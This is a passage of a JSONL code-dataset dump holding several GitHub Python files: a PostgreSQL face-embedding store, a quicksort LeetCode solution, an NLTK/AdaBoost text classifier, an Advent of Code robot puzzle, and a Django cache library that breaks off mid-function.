179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 182, "usage_type": "call"}, {"api_name": "itchat.send_msg", "line_number": 185, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 190, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 191, "usage_type": "call"}]}
+{"seq_id": "70758828329", "text": "from facekeeper.core import StorageInterface, PersonEmbedding\nimport numpy as np\nimport psycopg2\nfrom typing import List, Optional\nfrom psycopg2.extensions import register_adapter, AsIs\nfrom psycopg2.extras import RealDictCursor\n\n\ndef addapt_numpy_array(numpy_array):\n return AsIs(list(numpy_array))\n\n\nclass PostgreSQLStorage(StorageInterface):\n def __init__(self, dsn: str):\n super().__init__()\n register_adapter(np.ndarray, addapt_numpy_array)\n self.dsn = dsn\n self.conn = None\n\n def save_embedding(self, person: str, digest: str, recognizer: str, embedding: np.array, tags: List[str],) -> str:\n try:\n cur = self.get_connection().cursor()\n sql = \"INSERT INTO embeddings (person, digest, recognizer, embedding, tags) VALUES (%s, %s, %s, ARRAY%s, %s) RETURNING id\"\n cur.execute(sql, (person, digest, recognizer, embedding, tags))\n row = cur.fetchone()\n self.get_connection().commit()\n return row['id']\n except psycopg2.errors.UniqueViolation:\n self.get_connection().rollback()\n # We anyway will return the ID of already saved embedding\n return self.get_embedding_id(recognizer, digest)\n finally:\n cur.close()\n\n def get_embeddings(self, recognizer) -> List[PersonEmbedding]:\n cur = self.get_connection().cursor()\n sql = \"SELECT id, person, embedding, tags FROM embeddings WHERE recognizer = %s\"\n cur.execute(sql, (recognizer,))\n\n return [PersonEmbedding(r['id'], r['person'], np.array(r['embedding']), r['tags']) for r in cur.fetchall()]\n\n def get_embedding(self, embedding_id: str) -> dict:\n cur = self.get_connection().cursor()\n sql = \"SELECT * FROM embeddings WHERE id = %s\"\n cur.execute(sql, (embedding_id,))\n return cur.fetchone()\n\n def get_embedding_id(self, recognizer, digest) -> Optional[str]:\n cur = self.get_connection().cursor()\n cur.execute(\n \"SELECT id FROM embeddings WHERE recognizer = %s AND digest = %s\", (recognizer, digest),\n )\n row = cur.fetchone()\n return str(row['id']) if row else None\n\n def get_connection(self) -> psycopg2.extensions.connection:\n if self.conn is None:\n self.conn = self.connect()\n\n return self.conn\n\n def connect(self) -> psycopg2.extensions.connection:\n return psycopg2.connect(self.dsn, cursor_factory=RealDictCursor)\n", "repo_name": "dairlair/facekeeper", "sub_path": "facekeeper/storage/postgresql.py", "file_name": "postgresql.py", "file_ext": "py", "file_size_in_byte": 2479, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycopg2.extensions.AsIs", "line_number": 10, "usage_type": "call"}, {"api_name": "facekeeper.core.StorageInterface", "line_number": 13, "usage_type": "name"}, {"api_name": "psycopg2.extensions.register_adapter", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "psycopg2.errors", "line_number": 28, "usage_type": "attribute"}, {"api_name": "facekeeper.core.PersonEmbedding", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 35, "usage_type": "name"}, {"api_name": "facekeeper.core.PersonEmbedding", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "psycopg2.extensions", "line_number": 56, "usage_type": "attribute"}, {"api_name": "psycopg2.connect", "line_number": 63, "usage_type": "call"}, {"api_name": "psycopg2.extras.RealDictCursor", "line_number": 63, "usage_type": "name"}, {"api_name": "psycopg2.extensions", "line_number": 62, "usage_type": "attribute"}]}
+{"seq_id": "21453959135", "text": "import random\nfrom typing import List\n\n\nclass Solution:\n def sortArray(self, nums: List[int]) -> List[int]:\n low = 0\n high = len(nums)-1\n self._quick_sort(low, high, nums)\n return nums\n \n def _quick_sort(self, low: int, high: int, nums: List[int]) -> None:\n # 递归返回条件\n if low >= high:\n return\n mid = self._partition(low, high, nums)\n self._quick_sort(low, mid-1, nums)\n self._quick_sort(mid+1, high, nums)\n\n def _partition(self, low: int, high: int, nums: List[int]) -> int:\n # 选取pivot_idx\n pivot_idx = random.randint(low, high)\n # 将pivot换到首位(因为pivot已知 相当于把首位空下来)\n nums[low], nums[pivot_idx] = nums[pivot_idx], nums[low]\n pivot = nums[low]\n l, r = low, high\n while l < r:\n # r由右往左移动 找到一个小于pivot的数 将其挪到'空出来'的位置(此时的 l)\n # 完成'挪动'后此时 r 相当于也空了下来\n while l < r and nums[r] >= pivot:\n r -= 1\n nums[l] = nums[r]\n # l由左往右移动 找到一个大于pivot的数 将其挪到'空出来'的位置(此时的 r)\n # 完成'挪动'后此时 l 相当于也空了下来\n while l < r and nums[l] <= pivot:\n l += 1\n nums[r] = nums[l]\n nums[l] = pivot\n return l", "repo_name": "jerrt2003/leetcode-in-python", "sub_path": "912_Sort_an_Array/quick_sort.py", "file_name": "quick_sort.py", "file_ext": "py", "file_size_in_byte": 1450, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "5093241901", "text": "# ------------------ Importing necessary libraries -----------\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import PunktSentenceTokenizer\nfrom nltk.stem import WordNetLemmatizer \nimport nltk\nimport pickle\nimport re\n\nnltk.download('stopwords') #stopwords\nnltk.download('wordnet') #database of English language\nnltk.download('punkt') #tokenization\nnltk.download('vader_lexicon') \n \n\n# --------- Text cleaning ---------\ndef preprocess(text):\n text = str(text)\n #strip \n text = re.sub(r'.+? ', '', text) \n text = re.sub(r'.+? ', '', text)\n text = re.sub(r'<.+?>', '', text) # remove all other html tags\n text = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', text)\n \n ## remove punctuations, non-alphanumeric characters and underscores\n text = re.sub(r'[^\\w\\s]|\\d|_', ' ', text)\n \n text = str(text).lower().strip()\n \n #tokenize\n tokenizer = PunktSentenceTokenizer()\n tokens = tokenizer.tokenize(text)\n \n #remove stopwords\n stop_words = stopwords.words('english')\n tokens = [t for t in tokens if t not in stop_words]\n \n #lemmatize\n lemmatizer = WordNetLemmatizer()\n tokens = [lemmatizer.lemmatize(t) for t in tokens]\n text = \" \".join(tokens)\n text = str(text).lower().strip()\n text = [text]\n \n return text\n\n# ------- TFIDF + AdaBoost -----------\n\ndef model(text):\n # Preprocess text\n text = preprocess(text)\n \n # Load TFIDF\n tfidf = pickle.load(open(\"tfidftest.pkl\", \"rb\" ) )\n text_vectorized = tfidf.transform(text)\n \n # Apply Trained Model \n \n model = pickle.load(open('Ada10est81acc.sav', 'rb'))\n \n result = model.predict(text_vectorized)\n \n return result\n\n\n\n\n", "repo_name": "marinamer/Political-Bias-NLP", "sub_path": "Flask/ml_model.py", "file_name": "ml_model.py", "file_ext": "py", "file_size_in_byte": 1710, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.download", "line_number": 9, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 10, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 11, "usage_type": "call"}, {"api_name": "nltk.download", "line_number": 12, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 19, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 25, "usage_type": "call"}, {"api_name": "nltk.tokenize.PunktSentenceTokenizer", "line_number": 30, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 34, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 34, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 38, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 53, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "252855898", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nsolution for day 11 of 2019\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nimport sys; sys.path.append('..')\nfrom intcode import Intcode\nfrom collections import deque\nfrom matplotlib import pyplot as plt\n\n\nwith open('input.txt', 'r') as f:\n data = f.read()\n\n\nclass Robot(Intcode):\n\n def __init__(self, data, once=False, emerg_hull=False):\n self.coord = [[[0, 0], 0]]\n self.directions = deque(['up', 'right', 'down', 'left'])\n self.direction = None\n self.color = None\n self.painted = 1\n self.emerg_hull = emerg_hull\n self.inpt = None\n super().__init__(data, once)\n\n\n def getInput(self):\n \"\"\"returns the value that goes in input to op3\"\"\"\n if self.emerg_hull:\n self.emerg_hull = False\n return 1\n value = self.getCurrentColor()\n return value\n\n\n def getCurrentColor(self):\n \"\"\"returns the color of the tile the robot is standing on\"\"\"\n current = self.coord[-1]\n self.sensor_color = current[1]\n return self.sensor_color\n\n\n def manipulate(self):\n \"\"\"allows for the parsing of the 2 intcode outputs: color and rotation\"\"\"\n if len(self.outputs) % 2 == 0 and self.outputs != []:\n self.color = self.outputs[-2]\n if self.outputs[-1]:\n self.directions.rotate(-1)\n self.direction = self.directions[0]\n else:\n self.directions.rotate(1)\n self.direction = self.directions[0]\n self.move()\n\n\n def findTile(self, x, y):\n \"\"\"returns the tile if it's tracked, else None\"\"\"\n target = [x, y]\n for elem in self.coord[::-1]:\n if elem[0] == target:\n return elem\n\n\n def move(self):\n current = self.coord[-1]\n current[1] = self.color\n\n x, y = current[0] # get current coordinates\n\n if self.direction == 'up':\n y += 1\n elif self.direction == 'right':\n x += 1\n elif self.direction == 'down':\n y -= 1\n else:\n x -= 1\n\n target_tile = self.findTile(x, y)\n if target_tile:\n color = target_tile[1]\n else:\n color = 0\n self.painted += 1\n self.coord.append([[x, y], color])\n\nrobot = Robot(data)\nprint(robot.painted)\n\n\n# create a new object for part 2\nreg_ident = Robot(data, 1, emerg_hull=True)\ncode = [x[0] for x in reg_ident.coord if x[1] == 1]\n\nx_em = [x[0] for x in code]\ny_em = [y[1] for y in code]\n\nplt.scatter(x_em, y_em)\nplt.xlim(-3, 43)\nplt.ylim(-20, 20)\nplt.show()\n", "repo_name": "gmnr/advent-of-code", "sub_path": "2019/11/day11.py", "file_name": "day11.py", "file_ext": "py", "file_size_in_byte": 2671, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "intcode.Intcode", "line_number": 22, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}]}
+{"seq_id": "27212894053", "text": "import six\nimport time\nimport copy\n\nfrom distutils.version import StrictVersion\nfrom abc import ABCMeta, abstractmethod, abstractproperty\nfrom collections import defaultdict\nfrom functools import partial\n\nimport django\n\ntry:\n from django.core.cache import get_cache\nexcept ImportError:\n from django.core.cache import caches\n def get_cache(backend):\n return caches[backend]\n\nfrom django.http import Http404\nfrom django.db import models, transaction\n\ntry:\n from django.db.models import get_models\nexcept ImportError:\n from django.apps import apps\n get_models = apps.get_models\n\ntry:\n from django.db.models.fields.related import ReverseSingleRelatedObjectDescriptor\nexcept ImportError:\n from django.db.models.fields.related_descriptors import \\\n ForwardManyToOneDescriptor as ReverseSingleRelatedObjectDescriptor\n\nGenericForeignKeyObject = None\ndef importGenericForeignKey():\n global GenericForeignKeyObject\n if GenericForeignKeyObject is not None:\n return GenericForeignKeyObject\n try:\n from django.contrib.contenttypes.generic import GenericForeignKey\n GenericForeignKeyObject = GenericForeignKey\n except ImportError:\n from django.contrib.contenttypes.fields import GenericForeignKey\n GenericForeignKeyObject = GenericForeignKey\n return GenericForeignKey\n\n\nfrom flash import settings as flash_settings\nfrom flash.option import Some\nfrom flash.utils import memcache_key_escape, flash_properties\n\n\ncache = get_cache(flash_settings.CACHE_NAME)\n\n\ndef is_abstract_class(cls):\n \"\"\" Returns boolean telling whether given class is abstract or not.\n\n A class is abstract if it has not implemented any abstractmethod or\n abstractproperty of base classes.\n \"\"\"\n return bool(getattr(cls, \"__abstractmethods__\", False))\n\n\ndef instancemethod(method):\n \"\"\" Decorator for creating descriptor class to call method with\n instance when called with class.\n \"\"\"\n class MethodDisc(object):\n def __get__(self, ins, cls):\n if ins is None:\n # when method is called from class\n # get instance of that class and use that\n try:\n ins = cls()\n except NameError:\n return method\n return partial(method, ins)\n return MethodDisc()\n\n\nclass DontCache(object):\n def __init__(self, val):\n self.inner_val = val\n\n\n@six.python_2_unicode_compatible\nclass StaleData(object):\n def __init__(self, timestamp):\n self.timestamp = timestamp\n\n def __str__(self):\n return \"StaleData(timestamp=%s)\" % self.timestamp\n\n\ndef cache_get_many(keys):\n if not keys:\n return {}, {}\n\n d = cache.get_many(keys)\n result_dict = {}\n stale_data_dict = {}\n\n for key, value in d.items():\n if isinstance(value, StaleData):\n stale_data_dict[key] = value\n else:\n result_dict[key] = value\n\n return result_dict, stale_data_dict\n\n\nclass InvalidationType(object):\n OFF = 0\n UNSET = 1\n RESET = 2\n DYNAMIC = 3\n\nUSING_KWARG = '__using'\n\nclass WrappedValue(object):\n def __init__(self, value, version, timestamp):\n self.value = value\n self.version = version\n self.timestamp = timestamp\n\n\nclass Cache(six.with_metaclass(ABCMeta, object)):\n \"\"\" The very base class for all cache classes.\n\n Methods decorated with abstractmethod or abstractproperty\n have to be implemented by derived classes.\n\n It's necessary to put ABCMeta or its derived class to put\n as metaclass to achieve above constraints.\n \"\"\"\n # Derived class may provide serializer (E.g. for compression)\n serializer = None\n\n # default version\n version = 0\n\n # default timeout\n timeout = flash_settings.DEFAULT_TIMEOUT\n\n # default invalidation\n invalidation = InvalidationType.UNSET\n\n # default allowtime\n allowtime = None\n\n cache_type = 'SimpleCache'\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n @property\n def key(self):\n return self.get_key(*self.args, **self.kwargs)\n\n @abstractmethod\n def get_key(self, *args, **kwargs):\n \"\"\" Returns the key for given params (args and kwargs).\n \"\"\"\n pass\n\n @instancemethod\n def get_dynamic_version(self):\n from flash.models import CacheDynamicVersion\n return CacheDynamicVersion.objects.get_version_of(type(self))\n\n @staticmethod\n def get_stale_key(key):\n return key + '__stale'\n\n def to_cache_value(self, value):\n if self.serializer:\n value = self.serializer.dumps(value)\n return value\n\n def from_cache_value(self, value):\n if self.serializer:\n value = self.serializer.loads(value)\n return value\n\n @staticmethod\n def get_write_lock_key(key):\n return key + '__write_lock'\n\n def try_acquire_write_lock(self, key):\n write_lock_key = self.get_write_lock_key(key)\n return cache.add(write_lock_key, True,\n timeout=flash_settings.WRITE_LOCK_TIMEOUT)\n\n def release_write_lock(self, key):\n write_lock_key = self.get_write_lock_key(key)\n return cache.delete(write_lock_key)\n\n def get_option_value_from_cache_coroutine(self, key, extra_keys=None,\n key_value_dict=None):\n \"\"\" key: str,\n extra_keys: list\n key_value_dict: dict,\n\n Yields value assosiated with key in cache, wrapped as Option value.\n\n If extra_keys is passed then all values are fetched assosiated with\n keys in extra_keys and put to key_value_dict.\n \"\"\"\n keys = []\n keys.append(key)\n if extra_keys is not None:\n keys.extend(extra_keys)\n\n # result_dict is dict of key value pair\n result_dict = yield keys\n\n if not result_dict:\n yield None\n return\n\n if extra_keys and (key_value_dict is not None):\n keys_found = set(result_dict.keys()) & set(extra_keys)\n for key_found in keys_found:\n key_value_dict[key_found] = result_dict[key_found]\n\n if key not in result_dict:\n yield None\n return\n\n value = result_dict[key]\n if isinstance(value, WrappedValue):\n value.value = self.from_cache_value(value.value)\n else:\n value = self.from_cache_value(value)\n yield Some(value)\n\n @abstractmethod\n def get_value_for_params(self, *args, **kwargs):\n \"\"\" The fallback method to return value for given params.\n Mostly implemented to get value from database.\n \"\"\"\n pass\n\n def get_extra_keys(self, *args, **kwargs):\n pass\n\n def get_extra_key_value_dict(self, value, *args, **kwargs):\n pass\n\n def pre_set_process_value(self, value, *args, **kwargs):\n return value\n\n def post_process_value(self, value, *args, **kwargs):\n return value\n\n def _set(self, key, value, key_value_dict=None, stale_data_dict=None,\n force_update=False):\n \"\"\" Sets the given key value in cache.\n\n If key_value_dict is passed sets all key-values\n in this dict to cache too.\n \"\"\"\n if stale_data_dict is None:\n stale_data_dict = {}\n\n value = self.to_cache_value(value)\n value = WrappedValue(value, self.get_dynamic_version(), time.time())\n\n if key_value_dict is None:\n key_value_dict = {}\n key_value_dict[key] = value\n\n for key_, value_ in key_value_dict.items():\n if key_ in stale_data_dict:\n current_value_dict = cache.get_many([key_])\n if key_ in current_value_dict:\n current_value = current_value_dict[key_]\n stale_value = stale_data_dict[key_]\n if (isinstance(current_value, StaleData) and\n current_value.timestamp == stale_value.timestamp):\n cache.set(key_, value_, timeout=self.timeout)\n continue\n if force_update:\n cache.set(key_, value_, timeout=self.timeout)\n else:\n cache.add(key_, value_, timeout=self.timeout)\n\n def get_coroutine(self, *args, **kwargs):\n \"\"\" Yields the value for given params (args and kwargs).\n\n First tries to get it from cache. If not found, gets it from\n fallback method and sets the value to cache.\n \"\"\"\n key = self.get_key(*args, **kwargs)\n\n is_invalidation_dynamic = (\n self.invalidation == InvalidationType.DYNAMIC)\n extra_keys = self.get_extra_keys(*args, **kwargs) or []\n if is_invalidation_dynamic:\n stale_key = self.get_stale_key(key)\n extra_keys.append(stale_key)\n key_value_dict = {}\n\n coroutine = self.get_option_value_from_cache_coroutine(key, extra_keys,\n key_value_dict)\n keys = coroutine.send(None)\n result_dict, stale_data_dict = yield keys\n option_value = coroutine.send(result_dict)\n\n return_cache_value = False\n lock_acquired = False\n force_update = False\n if option_value is not None:\n # cache found in cache\n w_value = option_value.unwrap()\n current_dynamic_version = self.get_dynamic_version()\n if isinstance(w_value, WrappedValue):\n try_acquire_lock = False\n value = w_value.value\n if self.allowtime and (\n (time.time() - w_value.timestamp) < self.allowtime):\n return_cache_value = True\n elif (current_dynamic_version is not None and\n current_dynamic_version != w_value.version):\n if self.invalidation in [\n InvalidationType.OFF,\n InvalidationType.DYNAMIC]:\n try_acquire_lock = True\n else:\n force_update = True\n elif is_invalidation_dynamic:\n is_stale = stale_key in stale_data_dict\n if not is_stale:\n return_cache_value = True\n else:\n try_acquire_lock = True\n elif self.allowtime and (\n self.invalidation == InvalidationType.OFF):\n try_acquire_lock = True\n elif self.allowtime is None:\n return_cache_value = True\n else:\n force_update = True\n if try_acquire_lock:\n lock_acquired = self.try_acquire_write_lock(key)\n if not lock_acquired:\n return_cache_value = True\n else:\n force_update = True\n else:\n value = w_value\n return_cache_value = True\n\n if not return_cache_value:\n # get value using fallback method (e.g. db)\n value = self.get_value_for_params(*args, **kwargs)\n if not isinstance(value, DontCache):\n key_value_dict = self.get_extra_key_value_dict(\n value, *args, **kwargs)\n\n set_value_in_cache = True\n if (option_value is None and key in stale_data_dict and\n (time.time() - stale_data_dict[key].timestamp) < 0.3):\n # cache was just invalidated\n # db may return stale data\n # hence\n set_value_in_cache = False\n\n if StrictVersion(django.get_version()) < StrictVersion('1.7'):\n transaction.commit_unless_managed()\n\n value = self.pre_set_process_value(value, *args, **kwargs)\n\n # set the key value in cache\n if set_value_in_cache:\n self._set(key, value, key_value_dict, stale_data_dict,\n force_update=force_update)\n\n if is_invalidation_dynamic:\n cache.delete(stale_key)\n\n if lock_acquired:\n self.release_write_lock(key)\n\n if isinstance(value, DontCache):\n value = value.inner_val\n\n value = self.post_process_value(\n value, key_value_dict, *args, **kwargs)\n yield value\n\n def resolve_coroutine(self):\n return self.get_coroutine(*self.args, **self.kwargs)\n\n def get(self, *args, **kwargs):\n \"\"\" Returns the yielded vale from get_coroutine method\n \"\"\"\n coroutine = self.get_coroutine(*args, **kwargs)\n keys = coroutine.send(None)\n if flash_settings.DONT_USE_CACHE:\n result_dict, stale_data_dict = {}, {}\n else:\n result_dict, stale_data_dict = cache_get_many(keys)\n value = coroutine.send((result_dict, stale_data_dict))\n return value\n\n def resolve(self):\n return self.get(*self.args, **self.kwargs)\n\n def reset(self, *args, **kwargs):\n \"\"\" Resets the value in cache using fallback method for given params\n \"\"\"\n if flash_settings.DONT_USE_CACHE:\n return\n key = self.get_key(*args, **kwargs)\n value = self.get_value_for_params(*args, **kwargs)\n key_value_dict = self.get_extra_key_value_dict(value, *args, **kwargs)\n value = self.pre_set_process_value(value, *args, **kwargs)\n self._set(key, value, key_value_dict)\n\n def set(self, params, value, pre_set_process=True):\n \"\"\" Sets the given value in cache for given params\n \"\"\"\n if flash_settings.DONT_USE_CACHE:\n return\n key = self.get_key(**params)\n if pre_set_process:\n value = self.pre_set_process_value(value, **params)\n self._set(key, value, force_update=True)\n\n def resolve_async(self):\n from .loader import FlashCacheLoader\n from thread_context.dataloader_context import DataLoadersFactory\n\n loader = DataLoadersFactory.get_loader_for(FlashCacheLoader)\n return loader.load(self)\n\n\nclass BatchCacheQuery(object):\n \"\"\" Class to make multiple cache queries into one\n \"\"\"\n def __init__(self, *args, **queries):\n if args:\n self.queries = args[0]\n else:\n self.queries = queries\n\n def push(self, *args, **kwargs):\n if args:\n self.queries.update(args[0])\n else:\n self.queries.update(kwargs)\n\n def get(self, only_cache=False, none_on_exception=False,\n return_exceptions=False):\n all_cache_keys = set()\n coroutines_dict = {}\n value_dict = {}\n\n for key, cache_query in self.queries.items():\n coroutine = cache_query.resolve_coroutine()\n cache_keys = coroutine.send(None)\n all_cache_keys.update(cache_keys)\n coroutines_dict[key] = (coroutine, cache_keys)\n\n all_cache_keys = list(all_cache_keys)\n all_cache_result, all_stale_data_dict = cache_get_many(all_cache_keys)\n\n for key in coroutines_dict:\n coroutine, cache_keys = coroutines_dict[key]\n result_dict = {}\n stale_data_dict = {}\n\n to_continue = False\n for cache_key in cache_keys:\n if cache_key in all_cache_result:\n result_dict[cache_key] = all_cache_result[cache_key]\n elif only_cache:\n to_continue = True\n break\n elif cache_key in all_stale_data_dict:\n stale_data_dict[cache_key] = all_stale_data_dict[cache_key]\n if to_continue:\n continue\n\n try:\n value = coroutine.send((result_dict, stale_data_dict))\n value_dict[key] = value\n except Exception as e:\n if return_exceptions:\n value_dict[key] = e\n elif none_on_exception:\n value_dict[key] = None\n else:\n raise\n return value_dict\n\n\nclass BaseModelQueryCacheMeta(ABCMeta):\n \"\"\" Meta class for BaseModelQueryCache class.\n\n Deriving it from ABCMeta because BaseModelQueryCache is\n derived from Cache class wich has metaclass ABCMeta\n \"\"\"\n model_caches = defaultdict(list)\n model_caches_on_target_model = defaultdict(list)\n\n def __init__(self, *args, **kwargs):\n \"\"\" self is the class with BaseModelQueryCacheMeta as its\n metaclass\n \"\"\"\n super(BaseModelQueryCacheMeta, self).__init__(*args, **kwargs)\n\n if is_abstract_class(self):\n return\n\n # register self in model_caches dict corressponding to all the models\n # against which cache should get invalidated.\n for model in self.get_invalidation_models():\n self.model_caches[model].append(self)\n\n target_models = self.get_cache_model()\n if target_models:\n if not isinstance(target_models, (list, tuple)):\n # If it's a single model\n target_models = [target_models]\n for target_model in target_models:\n self.model_caches_on_target_model[target_model].append(self)\n\n\nclass BaseModelQueryCache(six.with_metaclass(BaseModelQueryCacheMeta, Cache)):\n \"\"\" Base class for all cache classes which cache some query's result\n on assosiated model.\n \"\"\"\n generic_fields_support = True\n\n def __init__(self, *args, **kwargs):\n if USING_KWARG in kwargs:\n self.using = kwargs.pop(USING_KWARG)\n else:\n self.using = self.get_using()\n super(BaseModelQueryCache, self).__init__(*args, **kwargs)\n\n @abstractproperty\n def model(self):\n pass\n\n def get_cache_model(self):\n return None\n\n @abstractproperty\n def key_fields(self):\n pass\n\n def get_using(self):\n return flash_settings.db_discoverer_func(self.model)\n\n def get_queryset(self):\n return self.model.objects.using(self.using)\n\n @instancemethod\n def get(self, *args, **kwargs):\n if USING_KWARG in kwargs:\n self.using = kwargs.pop(USING_KWARG)\n return super(BaseModelQueryCache, self).get(*args, **kwargs)\n\n @instancemethod\n def set(self, *args, **kwargs):\n return super(BaseModelQueryCache, self).set(*args, **kwargs)\n\n @abstractmethod\n def get_invalidation_models(self):\n pass\n\n @abstractmethod\n def get_keys_to_be_invalidated(self, instance, signal, using):\n pass\n\n def get_field_dict(self, *args, **kwargs):\n \"\"\" Returns the given params as dict of field_name as key\n and given param value as value\n \"\"\"\n field_dict = {}\n args_len = len(args)\n if args:\n # put all values in args in same order as of field_name in\n # key_fields starting.\n for i in range(args_len):\n field_name = self.key_fields[i]\n field_dict[field_name] = args[i]\n if kwargs:\n # iterate over all rest key_fields and take values from kwargs\n for field_name in self.key_fields[args_len:]:\n if field_name in kwargs:\n field_dict[field_name] = kwargs[field_name]\n else:\n # check if field is passed in kwargs as attname of field\n # If field is a related field (E.g. ForeignKey) then its\n # attname is actually postfixed with `_id`.\n # E.g. user field has attname user_id\n field = self.model._meta.get_field(field_name)\n if field.attname in kwargs:\n field_dict[field.attname] = kwargs[field.attname]\n else:\n raise KeyFieldNotPassed(field_name)\n return field_dict\n\n @instancemethod\n def get_key(self, *args, **kwargs):\n cls_name = self.__class__.__name__\n using = kwargs.pop(USING_KWARG, self.using)\n key = '%s__%s__%s' % (self.cache_type, using, cls_name)\n field_dict = self.get_field_dict(*args, **kwargs)\n\n for field_name in self.key_fields:\n if self.generic_fields_support:\n if hasattr(self.model, field_name):\n field_obj = getattr(self.model, field_name)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field_obj, GenericForeignKey):\n value = field_dict[field_name]\n if isinstance(value, tuple):\n ctype_id, object_id = value\n else:\n from django.contrib.contenttypes.models import ContentType\n ctype_id = ContentType.objects_cache.get_for_model(\n value).id\n object_id = getattr(value, value._meta.pk.attname)\n key += '__%s-%s' % (ctype_id, object_id)\n continue\n\n field = self.model._meta.get_field(field_name)\n\n if field_name in field_dict:\n value = field_dict[field_name]\n else:\n value = field_dict[field.attname]\n if isinstance(value, models.Model):\n # get the pk value on instance\n if field.rel:\n rel_model = field.rel.to\n else:\n # In very rare cases, field.rel is found to be None\n # that I do not know why.\n # fallback method to get rel_model\n rel_model = value.__class__\n value = getattr(value, rel_model._meta.pk.attname)\n \"\"\"\n if isinstance(value, unicode):\n value = value.encode('utf-8')\n \"\"\"\n key += '__%s' % str(value)\n key += '__v%s' % self.version\n key = memcache_key_escape(key)\n return key\n\n\nclass InstanceCacheMeta(BaseModelQueryCacheMeta):\n \"\"\" Meta class for InstanceCache class\n \"\"\"\n instance_cache_classes = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n ncls = super(InstanceCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n # store the new class's single instance with its model\n # in instance_cache_classes dict\n cls.instance_cache_classes[model].append(ncls)\n if (six.get_unbound_function(ncls.get_instance) ==\n six.get_unbound_function(InstanceCache.get_instance)):\n # if the get_instance method is not overriden then mark the class\n # as simple\n ncls.is_simple = True\n else:\n ncls.is_simple = False\n # ask the class the class to create assosiated related instance classes\n # if any\n ncls.register_related_caches()\n return ncls\n\n\nclass KeyFieldNotPassed(Exception):\n def __init__(self, field_name):\n msg = 'key field `%s` not given' % field_name\n super(KeyFieldNotPassed, self).__init__(msg)\n\n\nclass SameModelInvalidationCache(object):\n \"\"\" Mixin class to be used with InstanceCache, QuerysetCache classes.\n \"\"\"\n\n def _get_invalidation_models(self):\n return [self.model]\n\n def _get_keys_to_be_invalidated(self, instance, signal, using):\n keys = []\n for params in self.get_invalidation_params_list_(instance, signal):\n keys.append(self.get_key(*params, **{USING_KWARG: using}))\n return keys\n\n def get_invalidation_params_list_(self, instance, signal):\n \"\"\" It's called when an instance gets saved and caches\n have to be invalidated.\n\n Returns the list of params on which keys to be invalidated.\n \"\"\"\n params_list = []\n instances = []\n\n if isinstance(instance, tuple):\n # case when instances of many_to_many through model are added\n # or removed.\n instance, _, model, pk_set = instance\n if len(self.key_fields) == 1:\n if (self.key_fields[0] ==\n instance.__class__._meta.object_name.lower()):\n params = (instance.pk,)\n params_list = [params]\n elif (self.key_fields[0] ==\n model._meta.object_name.lower()):\n for pk in pk_set:\n params_list.append((pk,))\n return params_list\n\n filter_dict = {\n instance.__class__._meta.object_name.lower():\n instance.pk,\n '%s__in' % model._meta.object_name.lower():\n pk_set,\n }\n instances = list(self.model.objects.filter(**filter_dict))\n else:\n instances = [instance]\n\n for instance in instances:\n params = []\n params_pre = []\n instance_state_diff = instance.get_state_diff()\n for field_name in 